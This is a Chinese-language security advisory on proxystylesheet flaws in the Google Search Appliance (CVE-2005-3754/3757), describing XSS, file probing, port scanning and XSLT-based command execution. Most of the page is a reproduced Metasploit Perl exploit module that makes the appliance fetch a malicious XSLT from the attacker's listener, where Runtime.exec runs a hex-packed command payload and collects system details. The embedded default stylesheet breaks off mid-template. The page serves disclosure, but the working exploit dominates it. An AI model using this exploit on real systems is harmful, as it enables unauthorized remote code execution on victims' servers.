安全研究
安全漏洞
Google搜索工具ProxyStyleSheet多个远程安全漏洞
发布日期:2005-11-21
更新日期:2005-11-21
受影响系统:
Google Search Appliance描述:
Google Mini Search Appliance
BUGTRAQ ID: 15509
CVE ID: CVE-2005-3754,CVE-2005-3757
Google搜索工具是一款大型的企业级硬件搜索工具。Google搜索工具的搜索界面使用proxystylesheet表单变量判断应对搜索结果应用何种样式表。这个变量可以是本地文件名或HTTP URL。
Google搜索工具在处理proxystylesheet变量时存在多个安全漏洞,远程攻击者可能利用这些漏洞非授权获取系统信息或执行任意Javascript代码。
攻击者可以向proxystylesheet变量提供一段恶意的Javascript代码,这样工具就会根据该名称查找本地文件,并显示包含有Javascript代码的错误消息。
攻击者可以通过使用样式表目录的相对路径来判断系统中是否存在任意文件,从服务器返回的错误消息会泄漏是否提供了有效的路径。这个漏洞可用于判断底层操作系统和kernel版本。
由于从服务器返回的开放端口和关闭端口错误消息不同,攻击者可以通过请求执行目标系统及该系统上个别端口的HTTP URL来执行基本的端口扫描。
攻击者可以通过创建恶意的XSLT样式表并在proxystylesheet参数中指定到这个样式表的URL来执行跨站脚本攻击。搜索工具会下载样式表并向执行搜索的用户提交恶意的Javascript。
攻击者可以通过创建恶意的XSLT样式表在搜索工具上执行任意Java类方法,导致可以以非特权用户权限执行系统命令。如果结合有漏洞的kernel版本,就可能导致远程root shell。
<*来源:H D Moore (hdm@metasploit.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113260745222998&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::google_proxystylesheet_exec;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
use IO::Select;
my $advanced = { };
my $info =
{
'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
'Version' => '$Revision: 1.2 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a feature in the Saxon XSLT parser used by
the Google Search Appliance. This feature allows for arbitrary
java methods to be called. Google released a patch and advisory to
their client base in August of 2005 (GA-2005-08-m). The target appliance
must be able to connect back to your machine for this exploit to work.
}),
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],
'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],
'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
},
'Payload' =>
{
'Space' => 1024,
'Keys' => [ 'cmd' ],
},
'Refs' =>
[
['OSVDB', 20981],
],
'DefaultTarget' => 0,
'Targets' =>
[
[ 'Google Search Appliance']
],
'Keys' => [ 'google' ],
'DisclosureDate' => 'Aug 16 2005',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
sub Check {
my $self = shift;
my $s = $self->ConnectSearch;
if (! $s) {
return $self->CheckCode('Connect');
}
my $url =
"/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
"site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"output=xml_no_dtd&".
"q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
"proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";
$s->Send("GET $url HTTP/1.0\r\n\r\n");
my $page = $s->Recv(-1, 5);
$s->Close;
if ($page =~ /cannot be resolved to an ip address/) {
$self->PrintLine("[*] This system appears to be vulnerable >:-)");
return $self->CheckCode('Confirmed');
}
if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
$self->PrintLine("[*] This system appears to be patched");
}
$self->PrintLine("[*] This system does not appear to be vulnerable");
return $self->CheckCode('Safe');
}
sub Exploit
{
my $self = shift;
my ($s, $page);
# Request the index page to obtain a redirect response
$s = $self->ConnectSearch || return;
$s->Send("GET / HTTP/1.0\r\n\r\n");
$page = $s->Recv(-1, 5);
$s->Close;
# Parse the redirect to get the client and site values
my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im;
if (! $goog_site || ! $goog_clnt) {
$self->PrintLine("[*] Invalid response to our request, is this a Google appliance?");
return;
}
# Create the listening local socket that will act as our HTTP server
my $lis = IO::Socket::INET->new(
LocalHost => $self->GetVar('HTTPHOST'),
LocalPort => $self->GetVar('HTTPPORT'),
ReuseAddr => 1,
Listen => 1,
Proto => 'tcp');
if (not defined($lis)) {
$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
return;
}
my $sel = IO::Select->new($lis);
# Send a search request with our own address in the proxystylesheet parameter
my $query = Pex::Text::AlphaNumText(int(rand(32))+1);
my $proxy =
"http://".
($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).
":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl";
my $url =
"/search?client=". $goog_clnt ."&site=". $goog_site .
"&output=xml_no_dtd&proxystylesheet=". $proxy .
"&q=". $query ."&proxyreload=1";
$self->PrintLine("[*] Sending our malicious search request...");
$s = $self->ConnectSearch || return;
$s->Send("GET $url HTTP/1.0\r\n\r\n");
$page = $s->Recv(-1, 3);
$s->Close;
$self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");
# Did we receive a connection?
my @r = $sel->can_read(30);
if (! @r) {
$self->PrintLine("[*] No connection received from the search engine, possibly patched.");
$lis->close;
return;
}
my $c = $lis->accept();
if (! $c) {
$self->PrintLine("[*] No connection received from the search engine, possibly patched.");
$lis->close;
return;
}
my $cli = Msf::Socket::Tcp->new_from_socket($c);
$self->PrintLine("[*] Connection received from ".$cli->PeerAddr."...");
$self->ProcessHTTP($cli);
return;
}
sub ConnectSearch {
my $self = shift;
my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $self->GetVar('RHOST'),
'PeerPort' => $self->GetVar('RPORT'),
'SSL' => $self->GetVar('SSL')
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}
return $s;
}
sub ProcessHTTP
{
my $self = shift;
my $cli = shift;
my $targetIdx = $self->GetVar('TARGET');
my $target = $self->Targets->[$targetIdx];
my $ret = $target->[1];
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $content;
my $rhost;
my $rport;
# Read the first line of the HTTP request
my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));
# The way we call Runtime.getRuntime().exec, Java will split
# our string on whitespace. Since we are injecting via XSLT,
# inserting quotes becomes a huge pain, so we do this...
my $exec_str =
'/usr/bin/perl -e system(pack(qq{H*},qq{' .
unpack("H*", $self->GetVar('EncodedPayload')->RawPayload).
'}))';
# Load the template from our data section, we have to manually
# seek and reposition to allow the exploit to be used more
# than once without a reload.
seek(DATA, 0, 0);
while(<DATA>) { last if /^__DATA__$/ }
while(<DATA>) { $content .= $_ }
# Insert our command line
$content =~ s/:x:MSF:x:/$exec_str/;
# Send it to the requesting appliance
$rport = $cli->PeerPort;
$rhost = $cli->PeerAddr;
$self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT...");
my $res = "HTTP/1.1 200 OK\r\n" .
"Content-Type: text/html\r\n" .
"Content-Length: " . length($content) . "\r\n" .
"Connection: close\r\n" .
"\r\n" .
$content;
$self->PrintLine("[*] Sending ".length($res)." bytes...");
$cli->Send($res);
$cli->Close;
}
1;
# The default Google Mini style sheet is included below, with a few modifications to
# the my_page_footer template.
__DATA__
<!-- *** START OF STYLESHEET *** -->
<!-- **********************************************************************
XSL to format the search output for Google Search Appliance
********************************************************************** -->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:output method="html"/>
<!-- **********************************************************************
Logo setup (can be customized)
- whether to show logo: 0 for FALSE, 1 (or non-zero) for TRUE
- logo url
- logo size: '' for default image size
********************************************************************** -->
<xsl:variable name="show_logo">1</xsl:variable>
<xsl:variable name="logo_url">images/Title_Left.gif</xsl:variable>
<xsl:variable name="logo_width">200</xsl:variable>
<xsl:variable name="logo_height">78</xsl:variable>
<!-- **********************************************************************
Global Style variables (can be customized): '' for using browser's default
********************************************************************** -->
<xsl:variable name="global_font">arial,sans-serif</xsl:variable>
<xsl:variable name="global_font_size"></xsl:variable>
<xsl:variable name="global_bg_color">#ffffff</xsl:variable>
<xsl:variable name="global_text_color">#000000</xsl:variable>
<xsl:variable name="global_link_color">#0000cc</xsl:variable>
<xsl:variable name="global_vlink_color">#551a8b</xsl:variable>
<xsl:variable name="global_alink_color">#ff0000</xsl:variable>
<!-- **********************************************************************
Result page components (can be customized)
- whether to show a component: 0 for FALSE, non-zero (e.g., 1) for TRUE
- text and style
********************************************************************** -->
<!-- *** choose result page header: '', 'provided', 'mine', or 'both' *** -->
<xsl:variable name="choose_result_page_header">both</xsl:variable>
<!-- *** customize provided result page header *** -->
<xsl:variable name="show_result_page_adv_link">1</xsl:variable>
<xsl:variable name="adv_search_anchor_text">Advanced Search</xsl:variable>
<xsl:variable name="show_result_page_help_link">1</xsl:variable>
<xsl:variable name="search_help_anchor_text">Search Tips</xsl:variable>
<!-- *** search boxes *** -->
<xsl:variable name="show_top_search_box">1</xsl:variable>
<xsl:variable name="show_bottom_search_box">1</xsl:variable>
<xsl:variable name="search_box_size">32</xsl:variable>
<!-- *** choose search button type: 'text' or 'image' *** -->
<xsl:variable name="choose_search_button">text</xsl:variable>
<xsl:variable name="search_button_text">Google Search</xsl:variable>
<xsl:variable name="search_button_image_url"></xsl:variable>
<xsl:variable name="search_subcollections_xslt"></xsl:variable>
<!-- *** search info bars *** -->
<xsl:variable name="show_search_info">1</xsl:variable>
<!-- *** choose separation bar: 'blue', 'line', 'nothing' *** -->
<xsl:variable name="choose_sep_bar">blue</xsl:variable>
<!-- *** navigation bars: '', 'google', 'link', or 'simple'*** -->
<xsl:variable name="show_top_navigation">0</xsl:variable>
<xsl:variable name="choose_bottom_navigation">google</xsl:variable>
<xsl:variable name="my_nav_align">right</xsl:variable>
<xsl:variable name="my_nav_size">-1</xsl:variable>
<xsl:variable name="my_nav_color">#6f6f6f</xsl:variable>
<!-- *** sort by date/relevance *** -->
<xsl:variable name="show_sort_by">0</xsl:variable>
<!-- *** spelling suggestions *** -->
<xsl:variable name="show_spelling">1</xsl:variable>
<xsl:variable name="spelling_text">Did you mean:</xsl:variable>
<xsl:variable name="spelling_text_color">#cc0000</xsl:variable>
<!-- *** synonyms suggestions *** -->
<xsl:variable name="show_synonyms">1</xsl:variable>
<xsl:variable name="synonyms_text">You could also try:</xsl:variable>
<xsl:variable name="synonyms_text_color">#cc0000</xsl:variable>
<!-- *** keymatch suggestions *** -->
<xsl:variable name="show_keymatch">1</xsl:variable>
<xsl:variable name="keymatch_text">KeyMatch</xsl:variable>
<xsl:variable name="keymatch_text_color">#2255aa</xsl:variable>
<xsl:variable name="keymatch_bg_color">#e8e8ff</xsl:variable>
<!-- **********************************************************************
Result elements (can be customized)
- whether to show an element ('1' for yes, '0' for no)
- font/size/color ('' for using style of the context)
********************************************************************** -->
<!-- *** result title and snippet *** -->
<xsl:variable name="show_res_title">1</xsl:variable>
<xsl:variable name="res_title_color">#0000cc</xsl:variable>
<xsl:variable name="res_title_size"></xsl:variable>
<xsl:variable name="show_res_snippet">1</xsl:variable>
<xsl:variable name="res_snippet_size">80%</xsl:variable>
<!-- *** keyword match (in title or snippet) *** -->
<xsl:variable name="res_keyword_color"></xsl:variable>
<xsl:variable name="res_keyword_size"></xsl:variable>
<xsl:variable name="res_keyword_format">b</xsl:variable> <!-- 'b' for bold -->
<!-- *** link URL *** -->
<xsl:variable name="show_res_url">1</xsl:variable>
<xsl:variable name="res_url_color">#008000</xsl:variable>
<xsl:variable name="res_url_size">-1</xsl:variable>
<!-- *** misc elements *** -->
<xsl:variable name="show_res_description">1</xsl:variable>
<xsl:variable name="show_res_size">1</xsl:variable>
<xsl:variable name="show_res_date">1</xsl:variable>
<xsl:variable name="show_res_cache">1</xsl:variable>
<!-- *** used in result cache link, similar pages link, and description *** -->
<xsl:variable name="faint_color">#6f6f6f</xsl:variable>
<!-- *** show secure results radio button *** -->
<xsl:variable name="show_secure_radio">0</xsl:variable>
<!-- **********************************************************************
Other variables (can be customized)
********************************************************************** -->
<!-- *** page title *** -->
<xsl:variable name="front_page_title">Search Home</xsl:variable>
<xsl:variable name="result_page_title">Search Results</xsl:variable>
<xsl:variable name="adv_page_title">Advanced Search</xsl:variable>
<xsl:variable name="error_page_title">Error</xsl:variable>
<!-- *** choose adv_search page header: '', 'provided', 'mine', or 'both' *** -->
<xsl:variable name="choose_adv_search_page_header">both</xsl:variable>
<!-- *** cached page header text *** -->
<xsl:variable name="cached_page_header_text">This is the cached copy of </xsl:variable>
<!-- *** error message text *** -->
<xsl:variable name="xml_error_msg_text">Unknown XML result type.</xsl:variable>
<xsl:variable name="xml_error_des_text">View page source to see the offending XML.</xsl:variable>
<!-- *** advanced search page panel background color *** -->
<xsl:variable name="adv_search_panel_bgcolor">#cbdced</xsl:variable>
<!-- **********************************************************************
My global page header/footer (can be customized)
********************************************************************** -->
<xsl:template name="my_page_header">
<!-- *** replace the following with your own xhtml code or replace the text
between the xsl:text tags with html escaped html code *** -->
<xsl:text disable-output-escaping="yes"> <!-- Please enter html code below. --></xsl:text>
</xsl:template>
<xsl:template
name="my_page_footer"
xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime"
>
<!-- Google XSLT Code Execution [metasploit] -->
XSLT Version: <xsl:value-of select="system-property('xsl:version')"/> <br />
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> <br />
OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br />
Version: <xsl:value-of select="sys:getProperty('os.version')" /> <br />
Arch: <xsl:value-of select="sys:getProperty('os.arch')" /> <br />
UserName: <xsl:value-of select="sys:getProperty('user.name')" /> <br />
UserHome: <xsl:value-of select="sys:getProperty('user.home')" /> <br />
UserDir: <xsl:value-of select="sys:getProperty('user.dir')" /> <br />
Executing command...<br />
<xsl:value-of select="run:exec(run:getRuntime(), ':x:MSF:x:')" />
<xsl:text disable-output-escaping="yes"> <!-- Please enter html code below. --></xsl:text>
</span>
</xsl:template>
<!-- **********************************************************************
Logo template (can be customized)
********************************************************************** -->
<xsl:template name="logo">
<a href="{$home_url}"><img src="{$logo_url}"
width="{$logo_width}" height="{$logo_height}"
alt="Go to Search Home" border="0" /></a>
</xsl:template>
<!-- **********************************************************************
Search result page header (can be customized): logo and search box
********************************************************************** -->
<xsl:template name="result_page_header">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<xsl:if test="$show_logo != '0'">
<td rowspan="3" valign="top">
<xsl:call-template name="logo"/>
<xsl:call-template name="nbsp3"/>
</td>
</xsl:if>
<td nowrap="1">
<font size="-1">
<xsl:if test="$show_result_page_adv_link != '0'">
<a href="{$adv_search_url}">
<xsl:value-of select="$adv_search_anchor_text"/>
</a>
<xsl:call-template name="nbsp4"/>
</xsl:if>
<xsl:if test="$show_result_page_help_link != '0'">
<a href="{$help_url}">
<xsl:value-of select="$search_help_anchor_text"/>
</a>
</xsl:if>
<br/>
</font>
</td>
</tr>
<xsl:if test="$show_top_search_box != '0'">
<tr>
<td valign="middle">
<xsl:call-template name="search_box"/>
</td>
</tr>
</xsl:if>
<xsl:if test="/GSP/CT">
<tr>
<td valign="top">
<br/>
<xsl:call-template name="stopwords"/>
<br/>
</td>
</tr>
</xsl:if>
</table>
</xsl:template>
<!-- **********************************************************************
Separation bar variables (used in advanced search header and result page)
********************************************************************** -->
<xsl:variable name="sep_bar_bg_color">
<xsl:choose>
<xsl:when test="$choose_sep_bar = 'blue'">#3366cc</xsl:when>
<xsl:otherwise><xsl:value-of select="$global_bg_color"/></xsl:otherwise>
</xsl:choose>
</xsl:variable>
<xsl:variable name="sep_bar_text_color">
<xsl:choose>
<xsl:when test="$choose_sep_bar = 'blue'">#ffffff</xsl:when>
<xsl:otherwise><xsl:value-of select="$global_text_color"/></xsl:otherwise>
</xsl:choose>
</xsl:variable>
<!-- **********************************************************************
Advanced search page header HTML (can be customized)
********************************************************************** -->
<xsl:template name="advanced_search_header">
<table width="99%" border="0" cellpadding="0" cellspacing="2">
<tr>
<xsl:if test="$show_logo != '0'">
<td rowspan="2" width="1%">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td align="right" valign="bottom">
<xsl:call-template name="logo"/></td>
</tr>
</table>
</td>
</xsl:if>
<td valign="bottom" align="right"><font size="-1" class="p"></font></td>
</tr>
<tr>
<td valign="middle">
<table cellspacing="2" cellpadding="2" border="0" width="100%">
<tr bgcolor="{$sep_bar_bg_color}">
<td><font face="{$global_font}" color="{$sep_bar_text_color}">
<b><xsl:call-template name="nbsp"/>
<xsl:value-of select="$adv_page_title"/></b>
</font>
</td>
</tr>
</table>
</td>
</tr>
</table>
</xsl:template>
<!-- **********************************************************************
Cached page header (can be customized)
********************************************************************** -->
<xsl:template name="cached_page_header">
<xsl:param name="cached_page_url"/>
<table border="1" width="100%">
<tr>
<td>
<table border="1" width="100%" cellpadding="10" cellspacing="0"
bgcolor="{$global_bg_color}" color="{$global_bg_color}">
<tr>
<td>
<font face="{$global_font}" color="{$global_text_color}" size="-1">
<xsl:value-of select="$cached_page_header_text"/>
<a href="{$cached_page_url}"><font color="{$global_link_color}">
<xsl:value-of select="$cached_page_url"/></font></a>.<br/>
</font>
</td>
</tr>
</table>
</td>
</tr>
</table>
<hr/>
</xsl:template>
<!-- **********************************************************************
"Front door" search input page (can be customized)
********************************************************************** -->
<xsl:template name="front_door">
<html>
<xsl:call-template name="langHeadStart"/>
<title><xsl:value-of select="$front_page_title"/></title>
<xsl:call-template name="style"/>
<xsl:call-template name="langHeadEnd"/>
<body>
<xsl:call-template name="my_page_header"/>
<xsl:call-template name="result_page_header"/>
<hr/>
<xsl:call-template name="copyright"/>
<xsl:call-template name="my_page_footer"/>
</body>
</html>
</xsl:template>
<!-- **********************************************************************
Empty result set (can be customized)
********************************************************************** -->
<xsl:template name="no_RES">
<xsl:param name="query"/>
<span class="p">
<br/>
Your search - <b><xsl:value-of disable-output-escaping="yes"
select="$query"/></b> - did not match any documents.
<br/>
No pages were found containing <b>"<xsl:value-of
disable-output-escaping="yes" select="$query"/>"</b>.
<br/>
<br/>
Suggestions:
<ul>
<li>Make sure all words are spelled correctly.</li>
<li>Try different keywords.</li>
<li>Try more general keywords.</li>
</ul>
</span>
</xsl:template>
<!-- ######################################################################
We do not recommend changes to the following code. Google Technical
Support Personnel currently do not support customization of XSLT under
these Technical Support Services Guidelines. Such services may be
provided on a consulting basis, at Google's then-current consulting
services rates under a separate agreement, if Google personnel are
available. Please ask your Google Account Manager for more details if
you are interested in purchasing consulting services.
###################################################################### -->
<!-- **********************************************************************
Global Style (do not customize)
default font type/size/color, background color, link color
using HTML CSS (Cascading Style Sheets)
********************************************************************** -->
<xsl:template name="style">
<style>
<xsl:comment>
body,.d,.p,.s{background-color:<xsl:value-of select="$global_bg_color"/>}
body,td,div,.p,a,.d,.s{font-family:<xsl:value-of select="$global_font"/>}
body,td,div,.p,a,.d{font-size: <xsl:value-of select="$global_font_size"/>}
body,div,td,.p,.s{color:<xsl:value-of select="$global_text_color"/>}
.s,.f,.f a{font-size: <xsl:value-of select="$res_snippet_size"/>}
.l{font-size: <xsl:value-of select="$res_title_size"/>}
.l{color: <xsl:value-of select="$res_title_color"/>}
a:link,.w,.w a:link{color:<xsl:value-of select="$global_link_color"/>}
a:visited,.f a:visited{color:<xsl:value-of select="$global_vlink_color"/>}
a:active,.f a:active{color:<xsl:value-of select="$global_alink_color"/>}
.t{color:<xsl:value-of select="$sep_bar_text_color"/>}
.t{background-color:<xsl:value-of select="$sep_bar_bg_color"/>}
.z{display:none}
.f,.f:link,.f a:link{color:<xsl:value-of select="$faint_color"/>}
.i,.i:link{color:#a90a08}
.a,.a:link{color:<xsl:value-of select="$res_url_color"/>}
div.n {margin-top: 1ex}
.n a{font-size: 10pt; color:<xsl:value-of select="$global_text_color"/>}
.n .i{font-size: 10pt; font-weight:bold}
.q a:visited,.q a:link,.q a:active,.q {text-decoration: none; color:#0000cc;}
.b,.b a{font-size: 12pt; color:#0000cc; font-weight:bold}
.d{font-family:<xsl:value-of select="$global_font"/>;
margin-right:1em; margin-left:1em;}
</xsl:comment>
</style>
</xsl:template>
<!-- **********************************************************************
URL variables (do not customize)
********************************************************************** -->
<!-- *** help_url: search tip URL (html file) *** -->
<xsl:variable name="help_url">/basics.html</xsl:variable>
<!-- *** base_url: collection info *** -->
<xsl:variable name="base_url"><xsl:for-each
select="/GSP/PARAM[@name = 'client' or
@name = 'site' or
@name = 'num' or
@name = 'output' or
@name = 'proxystylesheet' or
@name = 'sitesearch' or
@name = 'access' or
(@name = 'restrict' and
$search_subcollections_xslt = '') or
@name = 'lr' or
@name = 'ie' or
@name = 'oe']"><xsl:value-of select="@name"
/>=<xsl:value-of select="@original_value"
/><xsl:if test="position() != last()">&</xsl:if></xsl:for-each>
</xsl:variable>
<!-- *** home_url: /search? + collection info + &proxycustom=<HOME/> *** -->
<xsl:variable name="home_url">/search?<xsl:value-of select="$base_url"
/>&proxycustom=<HOME/></xsl:variable>
<!-- *** nav_url: does not include q, as_, start elements *** -->
<xsl:variable name="nav_url"><xsl:for-each
select="/GSP/PARAM[(@name != 'q') and
not(contains(@name, 'as_')) and
(@name != 'start')]">
<xsl:value-of select="@name"/><xsl:text>=</xsl:text>
<xsl:value-of select="@original_value"/>
<xsl:if test="position() != last()">
<xsl:text disable-output-escaping="yes">&</xsl:text>
</xsl:if>
</xsl:for-each>
</xsl:variable>
<!-- *** synonym_url: does not include q, as_q, and start elements *** -->
<xsl:variable name="synonym_url"><xsl:for-each
select="/GSP/PARAM[(@name != 'q') and
(@name != 'as_q') and
(@name != 'start')]">
<xsl:value-of select="@name"/><xsl:text>=</xsl:text>
<xsl:value-of select="@original_value"/>
<xsl:if test="position() != last()">
<xsl:text disable-output-escaping="yes">&</xsl:text>
</xsl:if>
</xsl:for-each>
</xsl:variable>
<!-- *** search_url: $nav_url + query elements *** -->
<xsl:variable name="search_url"><xsl:for-each
select="/GSP/PARAM[(@name != 'start')]">
<xsl:value-of select="@name"/><xsl:text>=</xsl:text>
<xsl:value-of select="@original_value"/>
<xsl:if test="position() != last()">
<xsl:text disable-output-escaping="yes">&</xsl:text>
</xsl:if>
</xsl:for-each>
</xsl:variable>
<!-- *** filter_url: everything except resetting "filter=" *** -->
<xsl:variable name="filter_url">/search?<xsl:for-each
select="/GSP/PARAM[(@name != 'filter')]">
<xsl:value-of select="@name"/><xsl:text>=</xsl:text>
<xsl:value-of select="@original_value"/>
<xsl:text disable-output-escaping="yes">&</xsl:text>
</xsl:for-each><xsl:text>filter=</xsl:text>
</xsl:variable>
<!-- *** adv_search_url: /search? + $search_url + as_q=$q *** -->
<xsl:variable name="adv_search_url">/search?<xsl:value-of
select="$search_url"/>&proxycustom=<ADVANCED/></xsl:variable>
<!-- **********************************************************************
Search Parameters (do not customize)
********************************************************************** -->
<!-- *** num_results: actual num_results per page *** -->
<xsl:variable name="num_results">
<xsl:choose>
<xsl:when test="/GSP/PARAM[(@name='num') and (@value!='')]">
<xsl:value-of select="/GSP/PARAM[@name='num']/@value"/>
</xsl:when>
<xsl:otherwise>
<xsl:value-of select="10"/>
</xsl:otherwise>
</xsl:choose>
</xsl:variable>
<!-- *** form_params: parameters carried by the search input form *** -->
<xsl:template name="form_params">
<xsl:for-each
select="PARAM[@name != 'q' and
not(contains(@name, 'as_')) and
@name != 'btnG' and
@name != 'btnI' and
@name != 'filter' and
@name != 'start' and
@name != 'access' and
@name != 'ip']">
<xsl:if test="@name != 'restrict' or $search_subcollections_xslt = ''">
<input type="hidden" name="{@name}" value="{@value}" />
</xsl:if>
<xsl:text>
</xsl:text>
</xsl:for-each>
</xsl:template>
<!-- *** html_escaped_query: q = /GSP/Q *** -->
<xsl:variable name="qval">
<xsl:value-of select="/GSP/Q"/>
</xsl:variable>
<xsl:variable name="html_escaped_query">
<xsl:value-of select="normalize-space($qval)"
disable-output-escaping="yes"/>
</xsl:variable>
<!-- *** stripped_search_query: q, as_q, ... for cache highlight *** -->
<xsl:variable name="stripped_search_query"><xsl:for-each
select="/GSP/PARAM[(@name = 'q') or
(@name = 'as_q') or
(@name = 'as_oq') or
(@name = 'as_epq')]"><xsl:value-of select="@original_value"
/><xsl:if test="position() != last()"
><xsl:text disable-output-escaping="yes">+</xsl:text
></xsl:if></xsl:for-each>
</xsl:variable>
<xsl:variable name="access">
<xsl:choose>
<xsl:when test="/GSP/PARAM[(@name='access') and ((@value='s') or (@value='a'))]">
<xsl:value-of select="/GSP/PARAM[@name='access']/@original_value"/>
</xsl:when>
<xsl:otherwise>p</xsl:otherwise>
</xsl:choose>
</xsl:variable>
<!-- **********************************************************************
Figure out what kind of page this is (do not customize)
********************************************************************** -->
<xsl:template match="GSP">
<xsl:choose>
<xsl:when test="Q">
<xsl:call-template name="search_results"/>
</xsl:when>
<xsl:when test="CACHE">
<xsl:call-template name="cached_page"/>
</xsl:when>
<xsl:when test="CUSTOM/HOME">
<xsl:call-template name="front_door"/>
</xsl:when>
<xsl:when test="CUSTOM/ADVANCED">
<xsl:call-template name="advanced_search"/>
</xsl:when>
<xsl:when test="H1">
<xsl:call-template name="server_error"/>
</xsl:when>
<xsl:otherwise>
<xsl:call-template name="error_page">
<xsl:with-param name="errorMessage" select="$xml_error_msg_text"/>
<xsl:with-param name="errorDescription" select="$xml_error_des_text"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
<!-- **********************************************************************
Cached page (do not customize)
********************************************************************** -->
<xsl:template name="cached_page">
<xsl:variable name="cached_page_url" select="CACHE/CACHE_URL"/>
<xsl:variable name="cached_page_html" select="CACHE/CACHE_HTML"/>
<!-- *** decide whether to load html page or pdf file *** -->
<xsl:if test="'.pdf' != substring($cached_page_url,
1 + string-length($cached_page_url) - string-length('.pdf'))">
<base href="{$cached_page_url}"/>
</xsl:if>
<!-- *** display cache page header *** -->
<xsl:call-template name="cached_page_header">
<xsl:with-param name="cached_page_url" select="$cached_page_url"/>
</xsl:call-template>
<!-- *** display cached contents *** -->
<xsl:value-of select="$cached_page_html" disable-output-escaping="yes"/>
</xsl:template>
<xsl:template name="escape_quot">
<xsl:param name="string"/>
<xsl:call-template name="replace_string">
<xsl:with-param name="find" select="'"'"/>
<xsl:with-param name="replace" select="'&quot;'"/>
<xsl:with-param name="string" select="$string"/>
</xsl:call-template>
</xsl:template>
<!-- **********************************************************************
Advanced search page (do not customize)
********************************************************************** -->
<xsl:template name="advanced_search">
<xsl:variable name="html_escaped_as_q">
<xsl:call-template name="escape_quot">
<xsl:with-param name="string" select="/GSP/PARAM[@name='q']/@value"/>
</xsl:call-template>
<xsl:call-template name="escape_quot">
<xsl:with-param name="string" select="/GSP/PARAM[@name='as_q']/@value"/>
</xsl:call-template>
</xsl:variable>
<xsl:variable name="html_escaped_as_epq">
<xsl:call-template name="escape_quot">
<xsl:with-param name="string" select="/GSP/PARAM[@name='as_epq']/@value"/>
</xsl:call-template>
</xsl:variable>
<
建议:
厂商补丁:
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.google.com/enterprise/gsa/index.html
浏览次数:3844
严重程度:0(网友投票)
绿盟科技给您安全的保障